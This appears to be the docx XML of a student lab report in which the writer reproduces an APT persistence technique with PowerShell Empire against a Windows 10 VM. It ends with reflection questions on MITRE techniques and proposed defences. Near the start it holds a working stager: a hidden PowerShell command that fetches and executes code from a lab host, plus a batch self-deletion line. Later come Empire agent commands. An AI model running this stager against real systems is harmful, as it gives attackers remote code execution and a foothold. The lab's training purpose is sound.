      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">start powershell.exe -nol -w 1 -nop -ep bypass -command "&amp; { (New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials; iwr('http://10.0.0.58:8080/download/powershell/')-UseBasicParsing | Invoke-Expression }"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(goto) 2&gt;nul &amp; del "%~f0"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">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5C">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5D">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5E">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5F">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0">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1">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2">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3">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4">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5">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6">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7">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8">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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agents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> lists compromised systems that you now have access to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:after="3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6096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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After running the stager on the victim VM we have our agent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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rename [current] [new]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes the agent’s name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:spacing w:after="3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5731200" cy="8128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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Changed our agent name to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gotham</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:color w:val="cc3524"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">interact [agent name]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> launches the shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2990850" cy="1390650"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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9908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300" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Launched the shell and ran the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Were you able to issue commands to the Windows 10 victim computer? Make sure you establish a working shell before proceeding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yes, I was able to establish a working shell and run the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_v9erbttxb5mj" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="320" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vf2t00ex8h3u" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 4: Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000076">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Discuss in your own words the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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Why would an APT want to establish persistence on the Cyberdyne network?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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To be able to return to its mischief at any time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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What kind of threat actor are we dealing with here?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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APT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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Based on your reproduction, how could the batch file payload have been transmitted to the victim and executed the first time?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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It could have been sent multiple ways like a phishing attack or RCE using Invoke-PSExec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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Reboot the Windows 10 VM. Is the agent still responding to Empire? Explore the limitations of such a technique.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">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After rebooting, the agent is no longer active.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">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Is there a way to configure the batch file to not delete itself after executing? Explain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">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Yes, by simply removing the line </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(goto) 2&gt;nul &amp; del "%~f0 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">from the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">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Evaluate technique T1037. As the threat actor, what kind of synergy does this technique offer alongside T1059.003?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By evaluating the T1037 technique alongside T1059.003 as a threat actor i would use or create a boot up script to to maintain persistence </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At a high level, brainstorm what we could potentially do as defenders to protect Cyberdyne against this type of threat. Explore the various types of security controls:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preventative: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict write access to logon scripts to specific administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detective: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitor script execution logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="600" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Corrective: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate compromised systems to prevent further damage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:spacing w:after="600" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:spacing w:after="160" w:line="264" w:lineRule="auto"/>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4.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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0.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.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24.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